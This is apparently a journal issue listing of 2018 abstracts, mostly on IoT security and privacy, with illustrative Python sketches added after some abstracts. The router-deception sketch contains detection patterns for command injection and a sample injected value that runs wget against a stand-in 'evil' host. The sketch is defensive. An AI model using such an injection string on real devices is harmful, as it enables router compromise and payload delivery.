2018 Vol. 55 No. 7
2018, 55(7): 1359-1370.
DOI: 10.7544/issn1000-1239.2018.20180080
Abstract:
As a novel Internet of Things (IoT) sensing mode, mobile crowdsensing provides a new way and means for ubiquitous social perception. In mobile crowdsensing, a large amount of sensing data containing sensitive and private information of sensing users is gathered, and a great deal of valuable information can be mined from it, which greatly increases the risk of hacker attacks and private data leakage. How to better protect the privacy of the sensing data and the sensing platform, while encouraging more sensing users to participate in sensing tasks and provide real data, has become a prominent and pressing issue. To solve these problems, this paper proposes a user-union matching scheme based on the Bloom filter. Before uploading their sensing data, sensing users can choose to use the Bloom filter and the binary product of confusion vectors to estimate similarity, which effectively protects personal privacy. Meanwhile, aiming at the efficiency of private set intersection over sensing data, this study puts forward a lightweight private sensing data set intersection protocol, which realizes the intersection operation without leaking any user's real sensing data. Furthermore, we propose a reputation-aware incentive mechanism based on user-union matching, which effectively controls budget expenditure while improving the processing efficiency of sensing tasks. Finally, the security analysis shows that the proposed user-union matching scheme is provably secure and the proposed private sensing data set intersection protocol is secure, and the performance analysis and experimental results show that the proposed reputation-aware incentive mechanism is efficient and effective.
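As a rough illustration of the similarity-estimation step, the sketch below builds Bloom filters over two users' sensing records and estimates their overlap from the binary inner product of the bit vectors. It is a minimal stand-in: the function names, parameters (m, k), and the normalization are assumptions for illustration, and the paper's confusion-vector obfuscation and full private set intersection protocol are not reproduced here.

```python
import hashlib

def bloom_vector(items, m=256, k=4):
    """Build an m-bit Bloom filter (list of 0/1 ints) using k derived hash functions."""
    bits = [0] * m
    for item in items:
        for i in range(k):
            digest = hashlib.sha256(f"{i}:{item}".encode()).hexdigest()
            bits[int(digest, 16) % m] = 1
    return bits

def bloom_similarity(bf_a, bf_b):
    """Estimate set overlap as the binary inner product of two Bloom bit vectors,
    normalized by the smaller number of set bits (illustrative choice)."""
    inner = sum(a & b for a, b in zip(bf_a, bf_b))
    return inner / max(1, min(sum(bf_a), sum(bf_b)))

# Two users compare summaries of their sensing records without exchanging raw data.
u1 = bloom_vector(["pm2.5:42", "noise:60", "temp:21"])
u2 = bloom_vector(["pm2.5:42", "noise:61", "temp:21"])
print(bloom_similarity(u1, u2))
```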
2018, 55(7): 1371-1392.
DOI: 10.7544/issn1000-1239.2018.20170982
Abstract:
Defensive research against Android physical sensor-based side-channel attacks mainly targets privacy leaks that use mobile sensors as the medium. Current defensive methods include malicious activity detection, virtual keyboard randomization, etc. However, these traditional methods can hardly protect users' privacy from sensor-based side-channel attacks fundamentally, because user decisions are unpredictable and novel attacks keep emerging. To overcome these problems, this paper presents a defensive method against physical sensor-based side-channel attacks based on differential privacy. The method interferes with the construction of the side channel by injecting random noise drawn from the Laplace distribution, which obfuscates the original sensor data. The primary challenge of the proposed method is to reduce the success rate of side-channel attacks as much as possible while ensuring the normal operation of sensor-based functions and the user experience. With the help of SensorTainter, a sensor-based function extraction tool we designed, sensor-based functions are analyzed in detail and classified according to the types of underlying sensors and algorithms, and thus we estimate the range of sensor data obfuscation for each category of sensor-based function. By analyzing 47 144 apps and 9 typical sensor-based side-channel attacks, the experiments show that our defensive method can effectively defend against sensor-based attacks, reducing accuracy by at most 27 percentage points in one attempt during key-event side-channel attacks and by about 7 percentage points in tracking side-channel attacks. Because it is implemented in the Android framework, this defensive method is completely transparent to users and highly extensible.
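The core obfuscation step, injecting zero-mean Laplace noise into each raw sensor sample before it reaches an app, can be sketched as below. The sensitivity and epsilon values are illustrative assumptions; the paper derives the obfuscation range per category of sensor-based function, which is not reproduced here.

```python
import random

def laplace_noise(scale):
    """Sample zero-mean Laplace noise with scale b as the difference of two
    independent exponential samples (a standard construction)."""
    lam = 1.0 / scale
    return random.expovariate(lam) - random.expovariate(lam)

def obfuscate_reading(reading, sensitivity, epsilon):
    """Perturb one raw sensor sample before handing it to an app.

    The scale b = sensitivity / epsilon: a smaller epsilon means stronger
    obfuscation of the side channel but larger distortion of legitimate
    sensor-based functions -- the trade-off the paper tunes per function category.
    """
    return reading + laplace_noise(sensitivity / epsilon)

# Illustrative values: obfuscate an accelerometer x-axis sample of 0.42 m/s^2.
print(obfuscate_reading(0.42, sensitivity=0.05, epsilon=0.5))
```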
2018, 55(7): 1393-1408.
DOI: 10.7544/issn1000-1239.2018.20170920
Abstract:
To overcome the problem that the security of communication deteriorates significantly in the presence of eavesdropping, malicious behaviors, and privacy disclosure of the user platform in IoT wireless service systems, a secure inter-cluster transmission model based on a trusted third party is proposed. A trusted authentication model and a cluster address enquiry mechanism are constructed based on the hardness of the discrete logarithm problem and bilinear mapping. The model generates temporary identities from a hash function and random numbers to achieve anonymity, and only provides the enquiry service to trusted clusters authorized by the control center. The suppression of the Rudolph attack between the user platform and the coordinator is addressed by introducing the trusted third party into the authentication mechanism. Through key agreement between the source cluster and the clusters along the link, certificate validation, and a data padding mechanism, nested encryption and decryption and defense against flow analysis are achieved to guarantee inter-cluster transmission security. On this basis, a security proof of the data transmission model is presented. Theoretical analysis and experimental results show that the developed model performs well in terms of eavesdropping suppression, flow analysis inhibition, and anonymity protection.
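The anonymity step, deriving a temporary identity from a hash of the real identity and a fresh random number, might look like the sketch below. The function and field names are hypothetical; the paper's bilinear-map-based authentication and address enquiry mechanism are not shown.

```python
import hashlib
import secrets

def temporary_identity(real_id, nonce=None):
    """Derive a one-time pseudonym from the real identity and a fresh random nonce.

    A verifier that already knows the real identity and receives the nonce can
    re-derive the pseudonym, while an eavesdropper only sees unlinkable values.
    """
    nonce = nonce if nonce is not None else secrets.token_bytes(16)
    pseudonym = hashlib.sha256(real_id.encode() + nonce).hexdigest()
    return pseudonym, nonce

tid, nonce = temporary_identity("cluster-node-17")   # hypothetical node name
print(tid[:16], "...")
```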
2018, 55(7): 1409-1420.
DOI: 10.7544/issn1000-1239.2018.20180085
Abstract:
In the transitional period, the broadcasting network will cooperate with the 'cloud-channel-device' model to implement a unified layout and a service cloud platform. However, the openness of the cloud makes information security protection in the broadcasting network difficult. Attribute-based broadcast encryption combines the advantages of broadcast encryption and attribute-based encryption: it can securely transmit messages to multiple users and achieve flexible ciphertext access control, so it suits the broadcasting network with its many users and services. However, most attribute-based broadcast encryption schemes to date are not efficient enough and have many shortcomings, such as long ciphertexts, large user private keys, complicated encryption and decryption, and no support for weighted attributes. To overcome these flaws, the contribution of this paper is an efficient attribute-based broadcast encryption scheme for the broadcasting network environment. The scheme is based on a classical broadcast encryption scheme, so the sender can choose the receiver set freely, achieving efficient user revocation. It adopts a dynamic weighted threshold access structure and introduces a wildcard mechanism, which fixes the length of the broadcast ciphertext and enhances the flexibility of ciphertext access control; the weighted attributes make the scheme better match practical application environments. We incorporate mediated attribute-based encryption to achieve outsourced storage and outsourced decryption, which effectively reduces private key storage and computational overhead. Finally, through security analysis and experimental simulation, we prove that our scheme achieves chosen-plaintext attack (CPA) security and high efficiency.
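To make the dynamic weighted threshold access structure more concrete, the toy check below tests whether a user's attribute set accumulates enough weight to meet a policy, with a wildcard entry that any user satisfies. The attribute names, weights, and threshold are invented examples; only the access-structure test is shown, not the pairing-based encryption, revocation, or outsourced decryption.

```python
def satisfies_weighted_threshold(user_attrs, policy_weights, threshold):
    """Test whether a user's attributes accumulate enough weight to meet the policy.

    policy_weights maps attribute names to weights; the special name "*" is a
    wildcard whose weight every user receives.
    """
    score = 0
    for attr, weight in policy_weights.items():
        if attr == "*" or attr in user_attrs:
            score += weight
    return score >= threshold

policy = {"subscriber:sports": 2, "region:north": 1, "*": 1}   # invented example policy
print(satisfies_weighted_threshold({"subscriber:sports"}, policy, threshold=3))  # True
print(satisfies_weighted_threshold({"region:north"}, policy, threshold=3))       # False
```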
2018, 55(7): 1421-1431.
DOI: 10.7544/issn1000-1239.2018.20180065
Abstract:
Nowadays, a great deal of location- and time-critical data is collected by the Internet of Things (IoT), for example in intelligent fire control, intelligent transportation, and environmental monitoring. It is well known that the location and time information of such data plays an important role in many IoT applications; for example, time and location information is generated in fire alarm systems, vehicle systems, and UAV data acquisition systems. However, how to guarantee the security of such spatio-temporal data has become a challenge: on the one hand, data integrity should be provided; on the other hand, the location and time information of the data origin should be unforgeable. This study investigates position-based signatures as one solution to the security of spatio-temporal data in the IoT. Firstly, a static position-based digital signature without considering time and a dynamic position-based digital signature with a time constraint are proposed respectively. Then, a position-based digital signature protocol based on the bounded retrieval model in 3-dimensional space is proposed, which satisfies the security requirements of dynamic conditions. Furthermore, by analyzing the security of our protocol, we conclude that it can resist collusion attacks by adversaries and is provably secure.
2018, 55(7): 1432-1439.
DOI: 10.7544/issn1000-1239.2018.20180075
Abstract:
With the increasing popularity of IoT application technologies, one of the key enabling technologies, radio frequency identification (RFID), has been applied to more and more scenarios in various fields. Electronic tickets apply RFID technology to traditional tickets, making them storable, identifiable, and verifiable, and bringing great convenience and efficiency to people's daily life. However, RFID systems in electronic ticket applications still face many potential security risks, such as privacy leakage. To solve the security problems in electronic ticket applications, an ultra-lightweight RFID security authentication scheme is presented in this paper. Compared with schemes that use complex cryptographic algorithms, this scheme adopts simple logic operations and a timestamp synchronization and update mechanism, which can effectively resist desynchronization attacks and replay attacks, and can also effectively prevent information leakage. At the same time, matching the timestamp against the tag information stored in the database greatly improves the efficiency of database lookups. Through security and efficiency analysis, as well as performance comparison and simulation, the proposed scheme is shown to achieve higher security and efficiency than some existing schemes.
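A flavor of the ultra-lightweight approach, using only bitwise operations plus a timestamp, is sketched below. The specific mixing of XOR and rotation here is an invented example rather than the paper's protocol; it only shows why a replayed message (stale timestamp) fails verification and how the timestamp can double as a database lookup key.

```python
def rot(value, n, bits=32):
    """Circular left rotation on a fixed-width word, a typical ultra-lightweight primitive."""
    n %= bits
    mask = (1 << bits) - 1
    value &= mask
    return ((value << n) | (value >> (bits - n))) & mask

def tag_response(tag_id, shared_key, reader_nonce, timestamp):
    """Mix identifiers, a reader nonce, and the current timestamp with XOR and rotation only.

    Because the timestamp enters the computation, a response replayed with an old
    timestamp no longer verifies, and the back end can use the same timestamp to
    index the matching tag record instead of scanning the whole database.
    """
    mixed = tag_id ^ rot(shared_key, timestamp % 32)
    return rot(mixed ^ reader_nonce, shared_key % 32) ^ (timestamp & 0xFFFFFFFF)

# The reader verifies by recomputing the same value from its stored tag_id and shared_key.
print(hex(tag_response(0x1A2B3C4D, 0x0F0F0F0F, 0x13572468, 1530000000)))
```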
2018, 55(7): 1440-1450.
DOI: 10.7544/issn1000-1239.2018.20180087
Abstract:
With the rapid development of smart mobile devices, the Internet, and the Internet of Things, wireless routers have become the first choice for home networking. However, home wireless routers have so many security issues that both the routers and the smart devices connected to them face great security risks. Based on an analysis of the hardware, firmware, configuration management, and communication protocols of wireless routers, a defense method for home wireless routers based on cyber deception is proposed, which can solve part of the security problems of wireless routers. Attacks can be misled by adding a cyber deception mechanism to the router system: upon detecting attacks over HTTP, the suspected attack traffic is directed to a shadow server, which reduces the security risk of the wireless router and provides data support for further work on attack forensics and attacker traceability. OWCD, a prototype of the wireless router defense framework, is designed and implemented on OpenWrt and deployed on a Phicomm K1 wireless router for testing. The experimental results show that OWCD can effectively counter attacks on wireless routers such as weak passwords, CSRF, and command injection, and is thus an effective and feasible protection method.
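The deception idea of routing suspected HTTP attack traffic to a decoy can be sketched as below. The signatures, addresses, and function names are invented stand-ins; OWCD's actual detection rules and OpenWrt integration are not reproduced.

```python
import re

# Tiny stand-in rules for suspicious requests to a router's management interface;
# a real deployment would use far richer signatures.
SUSPICIOUS_PATTERNS = [
    re.compile(r"[;&|]\s*\w+"),             # shell metacharacters -> possible command injection
    re.compile(r"(?i)(wget|curl)\s+http"),  # fetching a remote payload
]

SHADOW_SERVER = ("192.0.2.10", 8080)   # decoy backend (documentation address)
REAL_BACKEND = ("127.0.0.1", 80)

def route_request(path, query):
    """Return the backend a request should be forwarded to.

    Requests matching an attack signature are transparently sent to the shadow
    (decoy) server, so the attacker interacts with fake state while the real
    configuration interface stays untouched and the exchange can be logged.
    """
    payload = f"{path}?{query}"
    if any(p.search(payload) for p in SUSPICIOUS_PATTERNS):
        return SHADOW_SERVER
    return REAL_BACKEND

print(route_request("/cgi-bin/config", "hostname=router;wget http://evil/x.sh"))
```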
2018, 55(7): 1451-1461.
DOI: 10.7544/issn1000-1239.2018.20180067
Abstract:
With the rapid development of the Internet of Things (IoT), IoT security issues have received widespread attention. The hardware and software characteristics of IoT devices make them extremely vulnerable to all types of attacks, and anomaly detection for IoT devices has become a research hotspot in recent years. Traditional protection methods based on intrusion detection and traffic analysis cannot adapt to the hardware and software environment of IoT devices. To solve this problem, an anomaly detection scheme based on chip radiation is proposed. Using the electromagnetic signals that IoT devices radiate during operation as the detection basis, features of the original signals are extracted and selected with a genetic algorithm and approximate entropy. Finally, the radiation signals of normal behavior are used to train a one-class support vector machine. The scheme is non-invasive, requiring no modification of the original hardware or software, and therefore applies to existing IoT devices. The final experimental results show that, compared with other commonly used anomaly detection schemes, this scheme can detect the abnormal behavior of IoT devices more effectively, with higher accuracy and a lower false alarm rate.
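The detection pipeline, training a one-class SVM only on radiation traces from normal operation and flagging windows that fall outside that model, could look roughly like the following. The windowing, the simple statistical features (stand-ins for the paper's genetic-algorithm and approximate-entropy feature selection), and the synthetic traces are all illustrative assumptions.

```python
import numpy as np
from sklearn.svm import OneClassSVM

def window_features(signal, win=256):
    """Split an EM trace into windows and compute simple stand-in features
    (mean, std, peak) per window."""
    windows = [signal[i:i + win] for i in range(0, len(signal) - win + 1, win)]
    return np.array([[w.mean(), w.std(), np.abs(w).max()] for w in windows])

# Train only on a trace captured while the device runs its normal firmware.
rng = np.random.default_rng(0)
normal_trace = rng.normal(0.0, 1.0, 10_000)
model = OneClassSVM(nu=0.05, kernel="rbf", gamma="scale").fit(window_features(normal_trace))

# A trace with an injected burst (e.g., unexpected activity) should yield flagged windows.
abnormal_trace = normal_trace.copy()
abnormal_trace[2000:2300] += 5.0
flags = model.predict(window_features(abnormal_trace))   # -1 marks abnormal windows
print(int((flags == -1).sum()), "windows flagged as abnormal")
```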
2018, 55(7): 1462-1478.
DOI: 10.7544/issn1000-1239.2018.20180073
Abstract:
With the development of Internet of Things (IoT) technology, a new scenario emerges in which different IoT networks form a large-scale, heterogeneous, and dynamic distributed IoT environment. Various cooperations among devices and IoT authorities are needed, and a trust mechanism is necessary to promote such cooperation. However, existing research on trust mechanisms is mostly separated from the IoT environment and does not consider the resource limitations of IoT devices or the great differences among them in computing and storage capabilities, so these abstract trust mechanisms cannot be directly applied to the IoT. On the other hand, existing research on IoT trust relies on an additional trusted third party or inter-domain trust assumptions, which are hard to achieve in practice. To solve these problems, we propose a trust management method suitable for the distributed IoT with the help of blockchain and risk theory. Specifically, we embody the abstract concept of trust as an examination of expected credit and risk, and enable effective sharing of trust data using a blockchain. Experimental simulation and analysis show that our method can quantify trust effectively, protect the trust data from tampering, and incur low storage cost.
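One simple way to read "trust as expected credit examined against risk" is the toy scoring function below, in which credit is the success rate of past cooperations and risk is the value-weighted failure rate. The weighting, input format, and formula are assumptions for illustration, and the blockchain-based sharing of trust data is not modeled.

```python
def trust_score(interactions, risk_weight=0.5):
    """Combine expected credit and risk into one trust value (a toy formulation).

    interactions: list of (outcome, value) pairs, where outcome is 1 for a
    successful cooperation and 0 for a failure, and value is the stake involved.
    """
    if not interactions:
        return 0.0
    credit = sum(o for o, _ in interactions) / len(interactions)       # success rate
    total_value = sum(v for _, v in interactions) or 1.0
    risk = sum(v for o, v in interactions if o == 0) / total_value     # value-weighted failures
    return credit - risk_weight * risk

history = [(1, 10), (1, 5), (0, 20), (1, 8)]
print(round(trust_score(history), 3))
```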
2018, 55(7): 1479-1487.
DOI: 10.7544/issn1000-1239.2018.20180056
Abstract:
On an Internet of Things (IoT) cloud platform, data is collected and used by IoT nodes, while data processing and storage rely on the cloud platform. The platform increases the data processing and sharing abilities of the IoT; meanwhile, it enriches cloud resources and improves the integration of the Internet with the human world. All of this offers advantages as well as new information security problems. Owing to the characteristics and limitations of IoT nodes, they are particularly vulnerable, so how to realize a trusted update of authorization for hijacked nodes is a crucial and urgent issue. To solve this problem, we propose a PRE-based trusted update scheme of authorization for nodes on an IoT cloud platform (PRE-TUAN). We first define the system model, which includes the trusted IoT data server and permission management server as well as a semi-trusted proxy re-encryption server in the cloud. We then describe the system workflow and algorithms, and finally analyze and prove the security of PRE-TUAN. PRE-TUAN is based on proxy re-encryption (PRE); it exploits the full potential of cloud computing and ensures the security and reliability of data in the IoT cloud.
2018, 55(7): 1488-1497.
DOI: 10.7544/issn1000-1239.2018.20180123
Abstract:
Data fusion is a critical process for data transmission in the Internet of Things (IoT). In data fusion, the original sensing data is processed and aggregated inside the network, and only the aggregated fusion results are sent to the application layer, which effectively reduces resource consumption and alleviates the workload on the sink node. Since no network node caches the data aggregated during fusion, it is impossible to detect and locate false data injection attacks against the fusion results. To mitigate this significant vulnerability, an efficient detection scheme for false data fusion is proposed in this paper. By modeling the data fusion process, we capture the relationship between the input data and the fusion results and apply the obtained model to detect abnormal fusion results, thereby mitigating malicious data fusion and improving IoT transmission security. In detail, we first collect the input data and the corresponding fusion results for each node, and design a compressed feature representation mechanism to improve data collection efficiency and reduce resource consumption. In addition, a data fusion model based on a probabilistic graphical model is proposed to depict the spatial and temporal relationship between the input data and the fusion results. Finally, we use the model to detect abnormal fusion results efficiently. The experimental results demonstrate that the proposed scheme can detect malicious data fusion operations efficiently and accurately and thus guarantee IoT transmission security.
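As a much simplified stand-in for the paper's probabilistic graphical model, the sketch below learns the typical residual between a node's reported fusion result and the mean of its inputs, and flags results that deviate by more than a few standard deviations. The data, threshold, and Gaussian residual assumption are illustrative only; the spatial-temporal modeling and compressed feature representation are not reproduced.

```python
import statistics

def fit_residual_model(history):
    """Fit a Gaussian model of the residual between a fusion result and the mean
    of its input readings, from historical (inputs, fused) pairs."""
    residuals = [fused - statistics.mean(inputs) for inputs, fused in history]
    return statistics.mean(residuals), statistics.pstdev(residuals) or 1e-9

def is_suspicious(inputs, fused, model, k=3.0):
    """Flag a fusion result whose residual deviates more than k standard deviations."""
    mu, sigma = model
    return abs((fused - statistics.mean(inputs)) - mu) > k * sigma

history = [([20.1, 19.8, 20.3], 20.1), ([21.0, 20.7, 21.2], 20.9), ([19.5, 19.9, 19.7], 19.7)]
model = fit_residual_model(history)
print(is_suspicious([20.2, 20.0, 20.4], 35.0, model))   # an injected false fusion result
```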
2018, 55(7): 1498-1507.
DOI: 10.7544/issn1000-1239.2018.20180078
Abstract:
Due to extensive code reuse, homologous binaries are widely found in IoT firmware images. Once a vulnerability is found in one firmware image, other images sharing a similar piece of code are at high risk, so homologous binary search is of great significance to IoT firmware security analysis. However, there is still no scalable and efficient homologous binary search method for IoT firmware: the time complexity of the traditional method is O(N), so it does not scale to large firmware collections. In this paper, we design, implement, and evaluate a scalable and efficient homologous binary search scheme for IoT firmware with time complexity O(lg N). The main idea is to encode a binary file's readable strings with a deep learning network and then generate a locality-sensitive hash of the encoding vector for fast retrieval. We compiled 893 open source components under 16 different compile-time parameter settings, resulting in 71 129 pairs of labeled binary files for training and testing the network model. The results show that our method has better ROC characteristics than the traditional method. In addition, the case study shows that our method can complete one homologous binary retrieval task over 22 594 firmware images in less than 1 second.
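One common way to turn an encoding vector into a locality-sensitive hash is random-hyperplane (SimHash-style) projection, sketched below. The dimensions, random planes, and synthetic embeddings are assumptions; the paper's deep string encoder and index structure are not reproduced.

```python
import numpy as np

def simhash_bits(embedding, planes):
    """Project an encoding vector onto random hyperplanes and keep the sign bits,
    giving a short locality-sensitive hash: similar embeddings share most bits."""
    return (planes @ embedding >= 0).astype(np.uint8)

rng = np.random.default_rng(42)
planes = rng.normal(size=(64, 128))   # 64-bit hash over 128-d string embeddings

# Two binaries built from the same source should get nearby embeddings, hence hashes
# with small Hamming distance; lookup over the hash values can then be organized in
# a sorted/multi-index structure for roughly logarithmic retrieval.
emb_a = rng.normal(size=128)
emb_b = emb_a + rng.normal(scale=0.05, size=128)
ha, hb = simhash_bits(emb_a, planes), simhash_bits(emb_b, planes)
print(int((ha != hb).sum()), "differing bits out of 64")
```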
2018, 55(7): 1508-1524.
DOI: 10.7544/issn1000-1239.2018.20170252
Abstract:
Recommendation systems can effectively solve the personalized recommendation problem for users. Collaborative filtering, one of the most commonly used algorithms in recommendation systems, needs to take all items into account, while a specific user may only be interested in items from certain domains. It is more natural to make recommendations for a user from the correlated domains than from the entire item set; therefore, users and items can be grouped according to their interests or characteristics, and recommendations can then be made within the user-item subgroups. Based on this idea, we propose a novel co-clustering method based on the features of users and items to find meaningful subgroups. The proposed method includes two main modules: a feature representation model that explores the interests of users and the characteristics of items, and a graph model constructed from these features that produces the final clustering results used for recommendation. In this paper, we introduce the framework of our method and give an effective solution for obtaining the features and the clustering results. Finally, by comparing with a variety of state-of-the-art algorithms on three open datasets, we verify that the proposed method can significantly improve the accuracy of the recommender system.
2018, 55(7): 1525-1538.
DOI: 10.7544/issn1000-1239.2018.20170080
Abstract:
Identifying proteins and their post-translational modifications (PTMs) is critical to the success of proteomics. Recent advances in mass spectrometry (MS) instrumentation have made it possible to generate high-resolution mass spectra of intact proteins. Existing algorithms for identifying proteins from top-down MS data achieve good performance in terms of protein-spectrum matching precision and the prediction accuracy of PTM locations, but their running times are still far from satisfactory. Graphics processing units (GPUs) can be used to parallelize large-scale repetitive computations and reduce the running time of serial programs. Based on the compute unified device architecture (CUDA), this paper proposes an algorithm called CUDA-TP for computing alignment scores between proteins and mass spectra. Firstly, CUDA-TP uses the optimized MS-Filter algorithm to quickly filter out proteins in the database that cannot attain a high score for a given mass spectrum, so only a small number of candidate proteins remain. Then, an AVL tree is introduced to speed up the computation of protein-spectrum matching. Multi-thread techniques on the GPU are applied to compute the preceding diagonal points of all nodes in the spectral grid created from the mass spectra and proteins, as well as the final array. Meanwhile, the algorithm uses the target-decoy approach to control the false discovery rate (FDR) of protein-spectrum matching results. Experimental results demonstrate that CUDA-TP can significantly accelerate protein identification, running about 10 times faster than MS-TopDown and 2 times faster than MS-Align+. To our knowledge, no existing method in the literature performs protein identification from top-down spectra using the CUDA architecture. The source code of the algorithm is available at https://github.com/dqiong/CUDA-TP.
2018, 55(7): 1539-1547.
DOI: 10.7544/issn1000-1239.2018.20170507
Abstract:
Question similarity calculation is a major task in community question answering (CQA); leveraging the similarity among queries helps retrieve relevant question-answer pairs from the QA community. Questions in CQA usually consist of a topic and a description, both of which are important for question similarity calculation. In addition, because of the openness of CQA, the lengths of questions vary widely, and the background information in a question can interfere with the similarity judgment. To reduce the influence of irrelevant content and varying question lengths, keywords are extracted from the question descriptions and fed to a CNN-based model that captures the similar and dissimilar information between the texts. At the same time, to make better use of the question topics, the model also incorporates a feature derived from the similarity between the topics. In summary, the model treats the keywords and topics as the key information about a question and uses this information to calculate the similarity between questions. The model is evaluated on the question similarity task of SemEval-2017, where its mean average precision (MAP) reaches 49.65%, exceeding the best result in the evaluation.
2018, 55(7): 1548-1556.
DOI: 10.7544/issn1000-1239.2018.20170506
Abstract:
Recognizing chemical compound and drug names from unstructured data is of great significance in biomedical text mining. The currently popular approaches are based on CRF models, which need large amounts of hand-crafted features, and these approaches inevitably suffer from the tagging inconsistency problem (the same mentions in a document are tagged with different labels). In this paper, we propose an attention-based BiLSTM-CRF architecture to mitigate these drawbacks. First, word embeddings are obtained from vast amounts of unlabeled biomedical text. Then the characters of the current word are fed to a BiLSTM layer to learn its character-level representation. After this, the word and character representations are passed to another BiLSTM layer, which generates the adjacency context representation of the current word. We then use an attention mechanism to obtain the current word's document-level context from the adjacency contexts of all words in the document and the current word itself. Finally, a CRF layer predicts the label sequence of the document from the combination of the adjacency context and the document-level context. Experimental results show that our method improves the consistency of mention labels within the same document and achieves better performance (an F-score of 90.77%) than state-of-the-art methods on the BioCreative IV CHEMDNER corpus.
2018, 55(7): 1557-1568.
DOI: 10.7544/issn1000-1239.2018.20160915
Abstract:
In distributed storage systems, how to reduce the regeneration time of lost data so as to maintain high reliability has attracted increasing attention. Recent research reveals that the node selection mechanism used during repair has a great impact on regeneration time. The SPSN (select provider, select newcomer) algorithm put forward in earlier studies suits the single-node-failure scenario well. However, repairing many nodes at the same time is very common in real systems, and in this scenario SPSN is no longer optimal once its large time and space consumption is taken into account. By analyzing the data failure traces of real distributed file systems, we propose a node selection algorithm, B-WSJ (bandwidth based weak and strong judgement), built on existing algorithms and a parallel repairing model suitable for the multi-failure scenario. To describe the algorithm, we first define several concepts of node relationships on a link; we then use these concepts to realize the weak and strong judgment of target nodes, with preprocessing and pruning strategies added; finally, the nodes with better bandwidth are chosen. To evaluate the performance of the node selection algorithm, we use the Waxman algorithm to generate network topologies and conduct extensive experiments with the node failure traces of real systems provided by the FTA (failure trace archive). The experimental results show that the B-WSJ algorithm improves greatly over the existing algorithms.
2018, 55(7): 1569-1583.
DOI: 10.7544/issn1000-1239.2018.20170053
Abstract:
Benchmarks are important means of evaluating processor microarchitecture. A high-throughput application is one that focuses on throughput efficiency and contains a large number of loosely coupled small-scale jobs; its typical characteristics are high throughput, hard real-time constraints, and high concurrency. The key target of processor microarchitecture design for high-throughput applications is to improve the throughput efficiency of operations, and such design needs micro-benchmarks drawn from high-throughput applications as the evaluation basis for building highly efficient processing architectures. For now, however, existing benchmarks cannot effectively and comprehensively evaluate processor microarchitecture designs for high-throughput applications. In this paper, we propose a suite of new benchmarks, HTC-MicroBench, for evaluating processor microarchitecture designs for high-throughput applications. Firstly, we present a classification method for high-throughput applications based on workload features. Secondly, according to the characteristics of high-throughput applications, we present a parallelization model based on the Pthread model to design and implement HTC-MicroBench. Furthermore, we evaluate HTC-MicroBench from many aspects, such as concurrency, data coupling, and cache efficiency. Finally, we use HTC-MicroBench to evaluate the speedup of TILE-Gx and Xeon. The evaluation results show that HTC-MicroBench can effectively evaluate processor microarchitecture designs for high-throughput applications.
2018, 55(7): 1584-1596.
DOI: 10.7544/issn1000-1239.2018.20170384
Abstract:
Because extensible processors provide good trade-offs among design cycle, flexibility, performance, and power consumption, they have been used more and more in embedded systems and electronic devices in recent years. Automatic identification of custom instructions is the key to the design of extensible processors. In this paper, we present and implement an iterative design flow for identifying maximal convex custom instructions (MCSs) from a given application code. The design flow addresses two essential problems: MCS enumeration and MCS selection. To solve the enumeration problem, we propose a very efficient algorithm for enumerating all maximal convex subgraphs in a sandwich manner that combines the advantages of the bottom-up and top-down approaches. Compared with the latest algorithms, our algorithm achieves orders-of-magnitude speedup; experimental results show speedups ranging from 5.6x to 47.3x. In the process of selecting MCSs, we observe that the number of candidates is usually small, and a large part of the search space can be pruned by applying the non-overlapping rule; it is therefore practical to use an exact algorithm for selecting MCSs. With the proposed exact algorithm, optimal solutions that maximize the performance improvement can be found in most cases.